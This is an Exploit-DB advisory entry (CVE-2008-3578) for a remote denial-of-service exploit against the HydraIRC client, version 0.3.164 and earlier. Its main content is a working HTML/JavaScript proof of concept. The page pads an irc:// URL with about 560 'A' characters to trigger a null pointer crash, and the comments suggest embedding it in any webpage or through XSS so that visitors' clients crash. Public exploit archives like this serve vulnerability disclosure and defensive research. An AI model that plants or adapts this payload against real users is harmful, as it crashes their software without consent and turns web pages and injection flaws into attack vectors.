HydraIrc <= 0.3.164 last Remote Denial of Service Exploit

2008-08-04T00:00:00
ID EDB-ID:6201
Type exploitdb
Reporter securfrog
Modified 2008-08-04T00:00:00

Description

HydraIrc <= 0.3.164 (last) Remote Denial of Service Exploit. CVE-2008-3578. Dos exploit for windows platform

                                        
                                            ############################################################
# Vendor : http://www.hydrairc.com/
# Remote : Yes
# Impact : Remote crash
# Bug : Null Pointer Dereference
# Working on : all browsers
#
#  Include this in any webpage or xss & see it with any browser , wait ~15sec, and boom.
#
# PoC :
#
&lt;html&gt;
&lt;head&gt; &lt;title&gt;HydraIRC Remote Denial Of Service Poc &lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var site = 'irc://127.0.0.1/'
var buf = 'A';
     while (buf.length &lt;= 560) buf = buf + 'A';
document.location.href=site +buf
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2008-08-04]